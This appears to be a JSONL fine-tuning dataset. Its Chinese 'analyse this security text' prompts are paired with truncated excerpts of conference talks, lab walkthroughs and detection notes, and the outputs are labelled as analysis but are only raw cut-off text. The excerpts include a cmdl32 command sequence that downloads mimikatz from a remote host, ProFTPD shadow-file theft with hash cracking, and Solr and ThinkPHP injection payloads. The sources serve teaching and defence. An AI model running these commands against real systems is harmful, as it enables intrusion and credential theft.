eyJ1c2VybmFtZSI6Ik5lcCJ9.XbpKRQ.yoQcrmWcma0XfA8cV0iDWjUTkbI eyJ1c2VybmFtZSI6Ik5lcSJ9.XbpKRQ.cLK4OL4twnjJC2v3LhStkxxEuok eyJ1c2VybmFtZSI6Ik5lciJ9.XbpKRQ.YankS3Do809DFBON7giqO27fHOE eyJ1c2VybmFtZSI6Ik5lcyJ9.XbpKRQ.qeP6kMVzYUBlJAVE8OgYO6x4hvo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBlowing up the Celly! Building Your Own SMS/MMS Fuzzer! ! Brian Gorenc, Manager, Vulnerability Research! Matt Molinyawe, Security Researcher! !  Copyright 2014 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.! 2! Agenda!  Introduction!  Testing Environment!  Bug Hunting!  Live Demonstration!  Key Takeaways!  Copyright 2014 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.! Introduction!  Copyright 2014 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.! 4! whois Brian Gorenc Employer: HP Organization: HP Security Research Zero Day Initiative Responsibilities: Manager, Vulnerability Research Organizing Pwn2Own Hacking Competition Verifying EIP == 0x41414141 Free Time: Endlessly following code paths that dont lead to vulnerabilities Twitter: @MaliciousInput, @thezdi  Copyright 2014 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.! 5! whois Matt Molinyawe Employer: HP Organization: HP Security Research Zero Day Initiative Responsibilities: Security Researcher Enjoying funny and awesome proof of concepts Measuring my productivity in hours of YouTube watched Process Janitor  Make exploits shine and not crash Calc Connoisseur Free Time: DJ Manila Ice  Two time United States Finalist DJ Beat Contra using only the laser without death Beat QWOP Martial Arts Twitter: @djmanilaice  Copyright 2014 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.! 6! Do-It-Yourself ! Fuzzing SMS/MMS is an interesting topic! Always-on technology! Limited in-line defenses! ! Every researcher will have a different take on the problem! Usually roll their own fuzzer along with mutation logic! ! Aim for this talk is to demonstrate approaches to get started in phone fuzzing! ! Using Android as the", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nApache Solr Injection Michael Stepankin @artsploit DEF CON 27 @whoami  Michael Stepankin  Security Researcher @ Veracode  Web app breaker  Works on making Dynamic and Static Code Analysis smarter  Penetration tester in the past  Never reported SSL ciphers Ones upon a time on bug bounty What is Solr?  Solr is the popular, blazing-fast, open source enterprise search platform built on Apache Lucene  Written in Java, open source  REST API as a main connector  Used by many companies (AT&T, eBay, Netflix, Adobe etc) https://lucene.apache.org/solr/ How does it look like? Solr Quick Start $ ./bin/solr start -e dih //start solr //add some data //search data Solr 101: simple query Requested content-type Solr 101: more complex query Local parameter name (default field) Parser type Collection (database) name Request Handler (select, update, config) Solr 101: more complex query Requested Fields (columns) Subquery for column similar Requested response type Common Solr Usage in Web App : Common Solr Deployment: behind a web app : Browser Solr /search?q=Apple /solr/db/select?q=Apple&fl=id,name&rows=10 Solr Parameter Injection (HTTP Query Injection) : Browser Solr /search?q=Apple%26xxx=yyy%23 /solr/db/select?q=Apple&xxx=yyy#&fl=id,name&rows=10 Solr Parameter Injection: Caveats  We can add arbitrary query parameters, but:  The request is still handled by the SearchHandler  We cannot rewrite collection name  But Solr still have some magic for us Solr Parameter Injection: Magic Parameters GET /solr/db/select?q=Apple&shards=http://127.0.0.1:8984/solr/db&qt=/ config%23&stream.body={\"set-property\":{\"xxx\":\"yyy\"}}&isShard=true  shards=http://127.0.0.1:8984/solr/db - allows to forward this request to the specified url  qt=/config%23  allows to rewrite query  stream.body={\"set-property\":{\"xxx\":\"yyy\"}}  treated by Solr as a POST body  isShard=true - needed to prevent body parsing while proxying Solr Parameter Injection: Magic Parameters GET /solr/db/select?q=Apple&shards=http://127.0.0.1:8984/", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTake advantage of randomness Frank Tse Nexusguard Agenda What is random Some applications of random Detecting anomalies from randomness Mitigating random attacks 1 2 3 4 Visualizing randomness 5 About::me From Hong Kong Researcher in DDoS I like RFC IT Security Identify them correctly Take actions accordingly Block the known bad Verify the known good Track the uncertain Challenge the suspicious DDoS: Good Human > Adult, Kid, Infant Bad Human > Smart, not-so-smart Good Bot (inhuman) Bad bot (inhuman) General IT security vs DDoS /dev/random Entropy: initial seeds for random number generation kern.random.sys.seeded non-blocking while reading kern.random.sys.harvest.ethernet LAN traffic kern.random.sys.harvest.point_to_point P2P interface kern.random.sys.harvest.interrupt HW interrupt (Mouse, keyboard) kern.random.sys.harvest.swi SW interrupt (exceptions) Initializing seed for random during boot up (HW) Entropy: initial seeds for random number generation If Im running on VM [ 0.000000] Booting paravirtualized kernel on KVM virtio-rng: a driver for feeding entropy between VM guest and host Problem: I dont trust virto-rng Solution: entropy from remote server entropy.ubuntu.com Angers Bridge, collapsed on Apr-16, 1850, due to soldiers marching across it. aka. Stuck in synchronization 2009 MAY 19, Storm Codec [ Baofeng] (暴风影音) brings down DNSpod. Due to lack of random back-off and sleep mechanism Routing protocol randomized hello timers to avoid stuck in synchronization RFC4271  Border Gateway Protocol v4 To minimize the likelihood that the distribution of BGP messages by a given BGP speaker will contain peaks, jitter SHOULD be applied to the timers associated with MinASOriginationIntervalTimer, KeepaliveTimer, MinRouteAdvertisementIntervalTimer, and ConnectRetryTimer. A given BGP speaker MAY apply the same jitter to each of these quantities, regardless of the destinations to which the updates are being sent; that is, jitter need not be configured on a per-peer basis. The s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBrowser-Powered Desync Attacks: A New Frontier in HTTP Request Smuggling James Kettle - james.kettle@portswigger.net - @albinowax The recent rise of HTTP Request Smuggling has seen a flood of critical findings enabling near-complete compromise of numerous major websites. However, the threat has been confined to attacker-accessible systems with a reverse proxy front-end... until now. In this paper, I'll show you how to turn your victim's web browser into a desync delivery platform, shifting the request smuggling frontier by exposing single-server websites and internal networks. You'll learn how to combine cross-domain requests with server flaws to poison browser connection pools, install backdoors, and release desync worms. With these techniques I'll compromise targets including Apache, Akamai, Varnish, Amazon, and multiple web VPNs. This new frontier offers both new opportunities and new challenges. While some classic desync gadgets can be adapted, other scenarios force extreme innovation. To help, I'll share a battle-tested methodology combining browser features and custom open-source tooling. We'll also release free online labs to help hone your new skillset. I'll also share the research journey, uncovering a strategy for black-box analysis that solved a long-standing desync obstacle and unveiled an extremely effective novel desync trigger. The resulting fallout will encompass client-side, server-side, and even MITM attacks. To wrap up, I'll demo mangling HTTPS to trigger an MITM-powered desync on Apache. Outline This paper covers four key topics. HTTP handling anomalies covers the sequence of novel vulnerabilities and attack techniques that led to the core discovery of browser-powered desync attacks, plus severe flaws in amazon.com and AWS Application Load Balancer. Client-side desync introduces a new class of desync that poisons browser connection pools, with vulnerable systems ranging from major CDNs down to web VPNs. Pause-based desync introduces a new desync techn", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# symfonos2-WalkThrough --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **靶机地址** - https://www.vulnhub.com/entry/symfonos-2,331/ **Description** OSCP-like Intermediate real life based machine designed to teach the importance of understanding a vulnerability. SHOULD work for both VMware and Virtualbox. **知识点** - smb 信息探测 - CVE-2015-3306 - CVE-2018-20434 - shadow 密码爆破 **实验环境** `环境仅供参考` - VMware Workstation 15 Pro - 15.0.0 build-10134415 - kali : NAT 模式,192.168.141.134 - 靶机 : NAT 模式 --- # 前期-信息收集 开始进行 IP 探活 ```bash nmap -sP 192.168.141.0/24 ``` 排除法,去掉自己宿主机网关, `192.168.141.149` 就是目标了 扫描开放端口 ```bash nmap -T5 -A -v -p- 192.168.141.149 ``` 212280139445 怎么又有 smb,枚举下 smb 试试 ```bash enum4linux 192.168.141.149 ``` 找到一个 `/anonymous` 文件夹和 2个用户,进去看看文件 ```bash smbclient //192.168.141.149/anonymous -U % -N ls cd backups\\ ls get log.txt ``` 查看下 log.txt 可以发现很多线索 开头告诉你 shadow 内容在 backups 目录下,然后后面是 smb 的配置,有个密码 然后开始看 ftp 的配置,配置文件说明了是 ProFTPD 程序还告诉你有个 aeolus 账号 想起来之前 nmap 扫描 FTP 得到的版本号是 1.3.5,也许可以找找漏洞 ```bash searchsploit -w proftpd 1.3.5 ``` 这3个都一样,漏洞编号为 CVE-2015-3306,但是这个漏洞只是可以复制文件,并不能直接进行命令执行,并且需要知道目标路径 --- # 中期-漏洞利用 这里我们从 log.txt 中可以得知 anonymous 用户的实际路径为 `/home/aeolus/share`,加上开头告诉你 shadow 文件在 backup 目录下,接下来就尝试将 backup目录下的 shadow 复制到 anonymous 用户目录下 ```bash ftp 192.168.141.149 site cpfr /var/backups/shadow.bak site cpto /home/aeolus/share/shadow.txt ``` 成功了,上 smb 下载下来 ```bash smbclient //192.168.141.149/anonymous -U % -N ls get shadow.txt exit cat shadow.txt ``` 下面用同样的方式下载 passwd 文件 ```bash ftp 192.168.141.149 site cpfr /etc/passwd site cpto /home/aeolus/share/passwd.txt smbclient //192.168.141.149/anonymous -U % -N get passwd.txt exit mkdir /root/.john cp passwd.txt /root/.john cp shadow.txt /root/.john cd /root/.john unshadow passwd.txt shadow.txt > hash.txt cat hash.txt ``` 使用 john 开始跑 hash ```bash gunzip /usr/share/wordlists/rockyou.txt.gz john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt ``` 只跑出 aeolus 一个用户的密码,使用这个凭证成功 SSH 上去 ``` aeolus sergioteamo ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# ThinkPHP5 SQL Injection Vulnerability && Sensitive Information Disclosure Vulnerability [中文版本(Chinese version)](README.zh-cn.md) ## Rationale Details to read the references - https://www.leavesongs.com/PENETRATION/thinkphp5-in-sqlinjection.html - https://xz.aliyun.com/t/125 ## Environment Setup Enter the following command: ``` docker compose up -d ``` Visiting `http://your-ip/index.php?ids[]=1&ids[]=2`, you'll see the username is displayed, indicating that the environment is running successfully. ## Exploit Open the page `http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1`you will find messages revealed successfully ![](01.png) And you can find the account and password of the database through the debug page. ![](02.png) This is another sensitive information disclosure vulnerability.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1105-Win-利用cmdl32进行文件下载行为(白名单) ## 来自ATT&CK的描述 攻击者可能会将工具或其他文件从外部系统转移到被攻陷的环境中可以通过命令控制通道从外部攻击者控制的系统中复制文件以便将工具带入被攻陷的网络环境中或通过与另一个工具如FTP的替代协议复制文件文件也可以在Mac和Linux上使用scprsync和sftp等本机工具进行复制 ## 测试案例 cmdl32.exe,CMAK连接管理器管理工具包使用它来设置连接管理器服务配置文件配置文件通常打包成一个.exe可以部署到用户系统该软件包安装可用于启动拨号/VPN连接的配置文件 ### 步骤一 使用以下命令并且生成相关配置文件 ```yml icacls %cd% /deny %username%:(OI)(CI)(DE,DC) set tmp=%cd% echo [Connection Manager] > settings.txt echo CMSFile=settings.txt >> settings.txt echo ServiceName=WindowsUpdate >> settings.txt echo TunnelFile=settings.txt >> settings.txt echo [Settings] >> settings.txt echo UpdateUrl=http://10.211.55.2:8000/mimikatz.exe >> settings.txt ``` ### 步骤二 然后继续执行即可下载成功 ```yml cmdl32 /vpn /lan %cd%\\settings.txt icacls %cd% /remove:d %username% move VPNBDFF.tmp mimikatz.exe ``` ## 检测日志 windows安全日志其他EDR类产品 ## 测试复现 windows server 2016进行测试测试效果Ok ```yml C:\\Users\\Administrator>cd C:\\Users\\Administrator\\Desktop\\test C:\\Users\\Administrator\\Desktop\\test>icacls %cd% /deny %username%:(OI)(CI)(DE,DC) 已处理的文件: C:\\Users\\Administrator\\Desktop\\test 已成功处理 1 个文件; 处理 0 个文件时失败 C:\\Users\\Administrator\\Desktop\\test>set tmp=%cd% C:\\Users\\Administrator\\Desktop\\test>echo [Connection Manager] > settings.txt C:\\Users\\Administrator\\Desktop\\test>echo CMSFile=settings.txt >> settings.txt C:\\Users\\Administrator\\Desktop\\test>echo ServiceName=WindowsUpdate >> settings.txt C:\\Users\\Administrator\\Desktop\\test>echo TunnelFile=settings.txt >> settings.txt C:\\Users\\Administrator\\Desktop\\test>echo [Settings] >> settings.txt C:\\Users\\Administrator\\Desktop\\test>echo UpdateUrl=http://10.211.55.2:8000/mimikatz.exe >> settings.txt C:\\Users\\Administrator\\Desktop\\test>cmdl32 /vpn /lan %cd%\\settings.txt C:\\Users\\Administrator\\Desktop\\test>icacls %cd% /remove:d %username% 已处理的文件: C:\\Users\\Administrator\\Desktop\\test 已成功处理 1 个文件; 处理 0 个文件时失败 C:\\Users\\Administrator\\Desktop\\test>move VPND1F2.tmp mimikatz.exe 移动了 1 个文件 ``` ## 测试留痕 ### 日志记录1 ```log 创建新进程4688windows安全日志 创建者主题: 安全 ID: QAX\\Administrator 帐户名: Administrator 帐户域: QAX", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Ghost in the flash (forensics/stegano, 4 solved, 416p) ``` Alice sent Bob a package with a flash drive. Bob thinks there is a message hidden on it but he couldn't find it. The only clue is the mysterious inscription on the envelope: \"Hear the voice of the future and remember: there are shadows because there are hills.\" Help Bob read the message! ``` We didn't manage to solve this task, but we got pretty far ahead, and it was fun, so we will share what we managed to find. In the task you get a large flashdrive dump. Apart from some random garbage-overwritten files there are 2 files of interest. First one seems to be a red-herring plng file: ![](herring.png) However it actually hints at a certain thing at later stage. The second thing we can find on the drive is a video, pretty much this one: https://www.youtube.com/watch?v=gXTnl1FVFBw The interesting thing about the video was the fact that the length was over 1h, instead of slighly over 8 minutes. Upon further inspection we found out that there are 2 audio tracks in the video. First one is the original one, as far as we could tell, but the other one was over 1h long beeps. We had to extract the sound file for further analysis. Doing this requires two steps: First, we had to find track numbers in the MKV file: ``` $ mkvinfo /media/GHOST_FLASH/Ghost_In_The_Shell_-_ Identity_in_Space.mkv [...] | + Track | + Track number: 3 (track ID for mkvmerge & mkvextract: 2) | + Track UID: 3 | + Lacing flag: 0 | + Language: und | + Default track flag: 0 | + Codec ID: A_PCM/INT/LIT | + Track type: audio | + Audio track | + Channels: 1 | + Sampling frequency: 2000 | + Bit depth: 16 [...] ``` And then use the `mkvextract` to export the track: ``` $ mkvextract /media/GHOST_FLASH/Ghost_In_The_Shell_-_\\ Identity_in_Space.mkv tracks 2:./track_2.wav ``` Once you look into [second track](track_2.wav) with Audacity you can see an interesting regularity in the wave shape: ![](shape.png) The entire file consists of either 1 or 3 sinusoids, an", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Kioptrix Level 1.2 下载地址 ``` https://download.vulnhub.com/kioptrix/KVM3.rar ``` ## 实战操作 扫描端口 ``` (rootkali)-[~/Desktop] # nmap -sV -p1-65535 192.168.32.137 Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-14 06:27 EST Nmap scan report for 192.168.32.137 Host is up (0.0030s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) MAC Address: 00:0C:29:71:27:48 (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.76 seconds ``` 浏览器打开80端口 ![](<../../.gitbook/assets/image (9) (1) (1) (1) (1).png>) nikto扫描web服务找到/phpmyadmin目录 ``` (rootkali)-[~/Desktop] # nikto -host 192.168.32.137 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.32.137 + Target Hostname: 192.168.32.137 + Target Port: 80 + Start Time: 2021-12-14 07:15:39 (GMT-5) --------------------------------------------------------------------------- + Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch + Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Cookie PHPSESSID created without the httponly flag + No CGI Directories found (use '-C all' to force check all possible dirs) + PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch. + Apache/2.2.8 appears to be outdated (current is at least Apac", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 性能监控 --- ## Actuator监控 ### Actuator 简介 在生产环境中往往需要对系统实际运行的情况例如 cpuiodiskdb业务功能等指标进行监控运维在 SpringBoot 项目中 Actuator 模块提供了众多 HTTP 接口端点Endpoint来提供应用程序运行时的内部状态信息 Actuator 模块提供了一个监控和管理生产环境的模块可以使用 httpjmxsshtelnet 等来管理和监控应用包括应用的审计Auditing健康health状态信息数据采集metrics gathering统计等监控运维的功能同时提供了可以扩展 Actuator 端点Endpoint自定义监控指标这些指标都是以 JSON 接口数据的方式呈现 需要注意的是SpringBoot 1.x 和 2.x 的 Actuator 监控设置差别很大不仅提供的 endpoint 路径不一樣连 application.properties 的配置也不一样 --- ### 使用 Spring Boot Actuator 如果要使用 Spring Boot Actuator 提供的监控功能需要先加入相关的 maven dependency依赖 ```xml <parent> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-parent</artifactId> <version>2.5.3</version> <relativePath/> <!-- lookup parent from repository --> </parent> <!-- actuator 依赖 --> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-actuator</artifactId> </dependency> <!-- WEB 依赖 --> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-web</artifactId> </dependency> ``` 只要加上了这个 maven dependencySpringBoot在运行时就会自动开启/actuator/health和/actuator/info这两个 endpoint然后就可以通过这两个 endpoint查看当前 SpringBoot应用程序的运行情况例如自动化配置信息创建的 Spring beans 以及一些环境属性等 为了保证 actuator 暴露的监控接口的安全性需要添加安全控制的依赖 spring-boot-start-security 依赖访问应用监控端点时都需要输入验证信息 ```xml <dependency> <!--Security 依赖 --> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-security</artifactId> </dependency> ``` 如果添加了security安全管理只需要在配置文件配置用户名和密码就可以了 ```yaml spring: security: user: name: admin password: 123456 ``` --- ### 开启 Actuator 所有 endpoints - https://docs.spring.io/spring-boot/docs/current/reference/html/actuator.html application.properties ```conf management.endpoints.web.exposure.include=* ``` --- ### 配置 jmx 形式的监控 ```conf management.endpoints.jmx.exposure.include=* ``` --- ## Prometheus **添加依赖** ```xml <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-actuator</artifactId> </dependency> <dependency> <groupId>io.micrometer</groupId> <ar", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEternal Exploits Reverse Engineering of FuzzBunch and MS17-010 zerosum0x0 August 1983 Warning! Presentation may contain classified information. Those with active security clearances are forewarned. TOP SECRET//SI/TK//NOFORN//ICATION//4201337//REL TO DEF CON Spot The Fed Champ 2018 Agenda  Recap (~2 mins)  Equation Group (NSA)  Shadow Brokers  SMBv1 Internals (~5 mins)  Network packets  Driver structures  Exploits (~40 mins)  Blue  Champion  Romance  Synergy  Payloads (~10 mins)  DoublePulsar  DarkPulsar  DanderSpritz SMBv1 Internals SMB Background  Server Message Block  1983 - Invented by Barry Feigenbaum (IBM)  Also, NetBIOS  Used EXTENSIVELY by Windows  \"LanMan\"  File Shares  Extensible protocol  Transport for DCE/RPC  psexec Server Message Block (v1)  Header Block  Command  Flags (request/reply, unicode)  Errno  Signature  UID/TID/PID/MID Server Message Block (v1)  Header Block  Command  Flags (request/reply, unicode)  Errno  Signature  UID/TID/PID/MID  Parameter Block  Contains a struct specific to the command  Fixed size WORD count Server Message Block (v1)  Header Block  Command  Flags (request/reply, unicode)  Errno  Signature  UID/TID/PID/MID  Parameter Block  Contains a struct specific to the command  Fixed size WORD count  Data Block  Misc. arbitrary info for the command  Variable size BYTE count SMBv1 Dialects  PC NETWORK PROGRAM 1.0  MICROSOFT NETWORKS 1.03  MICROSOFT NETWORKS 3.0  LANMAN1.0  Windows for Workgroups 3.1a  LM1.2X002  LANMAN2.1  NT LM 0.12  Cairo Srv.sys - SMBv1  SrvWorkQueues  SrvBlockingWorkQueues  Any operation that may take awhile  SMB is designed for speed Srv.sys - SMBv1  SrvWorkQueues  SrvBlockingWorkQueues  Any operation that may take awhile  SMB is designed for speed  WORK_CONTEXT  C union mega-struct SMB info Srv.sys - SMBv1  SrvWorkQueues  SrvBlockingWorkQueues  Any operation that may take awhile  SMB is designed for speed  WORK_CONTEXT  C union mega-struct SMB info  SMB may be restarted multiple times  Send to a blocking thread ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nREDNAGA ANDROID COMPILER FINGERPRINTING CALEB FENTON - TIM DIFF STRAZZERE 07.22.2016 HITCON COMMUNITY 2016 WHO ARE WE  Banded together by the love of 0days and hot sauces  Random out of work collaboration and pursuit of up-leveling the community  Disclosures / Code / Lessons available on GitHub  rednaga.io  github.com/RedNaga RED NAGA? WHO ARE WE  Researcher @ SentinelOne  Former Researcher @ SourceClear Former Researcher @ Lookout  Texan at heart, Californian based on shorts and sandals 24/7  Creator of Simplify  @CalebFenton  github.com/CalebFenton CALEB WHO ARE WE  Researcher @ SentinelOne  Former Researcher @ Lookout  Obfuscation and Packer Junkie  Makes own hot sauce - cause why not?  @timstrazz  github.com/strazzere DIFF  More importantly - why should you care? WHY ARE WE HERE  Threat Intel is important!  Used for many purposes:  What are people researching now?  What should you research next?  Anticipate attack patterns  Avoid overlap with others!  We like drinking What should you learn from us today? THE TAKE AWAYS  How to fingerprint compilers (generically)  Abnormalities in DEX structure or values  Signals modification / tampering  Compiler fingerprinting  Sophisticated agents  Related PC stuff  F.L.I.R.T. - https://www.hex-rays.com/products/ida/tech/flirt/index.shtml  PEID - http://www.aldeid.com/wiki/PEiD REDNAGA CURRENT ANDROID TOOL LANDSCAPE Tools and Evolution application/vnd.android.package-archive ANDROID APPLICATION PACKAGING (APK)  Blah.apk META-INF/ MANIFEST.MF CERT_NAME.(RSA | DSA) CERT_NAME.SF lib/ armeabi(-v7a)/ arm64-v8a/ x86/ mips/ lib*.so res/ drawable-*/ xml/ raw/  *.png *.xml  assets/ * AndroidManifest.xml classes.dex resources.arsc    * application/vnd.android.package-archive ANDROID APPLICATION PACKAGING (APK)  Blah.apk META-INF/ MANIFEST.MF CERT_NAME.(RSA | DSA) CERT_NAME.SF lib/ armeabi(-v7a)/ arm64-v8a/ x86/ mips/ lib*.so res/ drawable-*/ xml/ raw/  *.png *.xml  assets/ * AndroidManifest.xml classes.dex resources.arsc    * Two resources w", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSniper Forensics One Shot, One Kill Christopher E. Pogue - Trustwave Copyright Trustwave 2009 Confidential Thank You Dan Christensen! http://dcdrawings.blogspot.com/ Copyright Trustwave 2009 Confidential Who Am I?  Senior Security Consultant for the Trustwave SpiderLabs  Masters degree in Information Security  Author of Unix and Linux Forensic Analysis by Syngress  Author of the blog, The Digital Standard  Board of Governors for the HTCIA  Member of the USSS Miami Electronic Crimes Task Force  Speaker @ SANS What Works in Incident Response 09 and 10, The Computer Forensics Show 09 and 10, Direct Response Forum, SecTor 09 and 10, USSS ECTF - Miami Conference, The Next HOPE, BSIDESLV, and most recently, DEF CON 18.  Former US Army Signal Corps Warrant Officer  Former CERT team member  SEI at CMU Copyright Trustwave 2009 Confidential Agenda  What is Shotgun Forensics?  What is Sniper Forensics?  Guiding Principles  Create an Investigation Plan  Data Reduction  Volatile Data Gathering and Analysis  Data Correlation  Tools  Case Studies  Bring it All Together  Conclusion Copyright Trustwave 2009 Confidential Shotgun Forensics The process of taking a haphazard, unguided approach to forensic investigations:  Old school  Image everything  Reliance on tools  autopilot  Pull the plug Copyright Trustwave 2009 Confidential Sniper Forensics The process of taking a targeted, deliberate approach to forensic investigations:  Create an investigation plan  Apply sound logic  Locard  Occam  Alexiou  Extract what needs to be extracted, nothing more  Allow the data to provide the answers  Report on what was done  Answer the questions Copyright Trustwave 2009 Confidential Three Round Shot Group Infiltration  How did the bad guy(s) get onto the system(s) Aggregation  What did they do  What did they steal Exfiltration  How did they get off the system  How did they get stolen data off the system * This is commonly referred to as the Breach Triad  term credited to Colin Sheppard, Incident Re", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Shoes Category: Networking, 80 Points ## Description > Hi Ash! We have found Team Rocket's secret server. > > We have a good feeling that there is a hidden message inside it, and you have to find it. In order to help you, we have managed to get a PCAP from someone who had access to the server in the past, we hope you find it useful. > > In addition, we have discovered an email that may be connected. All of the files are safe for download, don't worry. > > Good luck! A network capture and an email were attached. ## Solution The attached email describes a conversation between two members of Team Rocket: ``` To: jessie@team-rocket.io Subject: RE: My protocolll Hi sis! Make it double haha ;) I reviewed your work, love how you didn't reinvent the wheel in your implementation, smart! Regarding the checksum, Meowth suggested for using a standard error detection mechanism, you can use a similar algorithm of Ethernet's checksum, but keep it simple... I hope it will keep Ash outside of our servers! James, Team Rocket inc. From: Jessie <jessie@team-rocket.io> Sent: Wednesday, January 8, 2020 11:35 AM To: james@team-rocket.io Subject: My protocolll Sup Jessie! Prepare for trouble... just kidding. I'm trying to implement our server communication protocol, do ya think we need some kind of checksum? Jessie, Team Rocket inc. ``` The attached network capture includes the following protocols: ```console root@kali:/media/sf_CTFs/checkpoint/Shoes# tshark -nr capture.pcapng -qz io,phs Running as user \"root\" and group \"root\". This could be dangerous. =================================================================== Protocol Hierarchy Statistics Filter: eth frames:111 bytes:11496 ip frames:108 bytes:11324 tcp frames:78 bytes:7682 http frames:8 bytes:2072 socks frames:14 bytes:2242 icmp frames:14 bytes:1372 udp frames:16 bytes:2270 dns frames:16 bytes:2270 arp frames:2 bytes:102 ipv6 frames:1 bytes:70 icmpv6 frames:1 bytes:70 ============================================================", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHIT2006 HIT2006 Spyware Detection : Spyware Detection : Automated Behavior Analysis System Automated Behavior Analysis System Birdman Birdman 2006 2006--07 07--16 16 XX--Solve Solve Automated Behavior Analysis Approach, Birdman, HIT2006 Automated Behavior Analysis Approach, Birdman, HIT2006 2 Abstract Abstract 分析目前流行的 分析目前流行的Spyware Spyware設計手法與運作模型並介紹我 設計手法與運作模型並介紹我 們所開發的自動化的惡意程式行為分析系統與整合型 們所開發的自動化的惡意程式行為分析系統與整合型 Spyware Spyware偵察工具用來協助資安人員研究新的 偵察工具用來協助資安人員研究新的Spyware Spyware與 與 惡意程式行為模型 惡意程式行為模型 Birdman Birdman birdman@x-solve.com, XX--Solve Solve Our WebSite Http://x-solve.com/blog Column Writer http://www.informationsecurity.com.tw MSDN Flush Writer http://www.microsoft.com/taiwan/msdn 勇 勇 X-Solve, Inc. is a company focusing on developing IT Security technology for the reliable and high assurance detection and eradication of Spyware and Rootkit. Automated Behavior Analysis Approach, Birdman, HIT2006 Automated Behavior Analysis Approach, Birdman, HIT2006 3 Outline Outline What is Spyware? What is Spyware? The Malicious Behavior Models of Spyware The Malicious Behavior Models of Spyware Strategy of Spyware Analysis and Detection Strategy of Spyware Analysis and Detection Archon Scanner Archon Scanner -- Spyware Detection Tools Spyware Detection Tools Archon Analyzer Archon Analyzer -- Automated Malicious Behavior Analyzer Automated Malicious Behavior Analyzer Conclusion Conclusion Automated Behavior Analysis Approach, Birdman, HIT2006 Automated Behavior Analysis Approach, Birdman, HIT2006 4 What is Spyware? What is Spyware? Definition Definition Spyware is considered a malicious program in that users unwittingly install the product when they install something else. There are two types of Spyware. There are two types of Spyware. Commercial Purpose This type Spyware do track your surfing habits in order to serve ads related to user. Adware, Browser Hijacker or other unwanted software Invasive Purpose This type is designed for hacker, they are more malicious than ano", "category": "text_analysis", "source": "security_papers"}
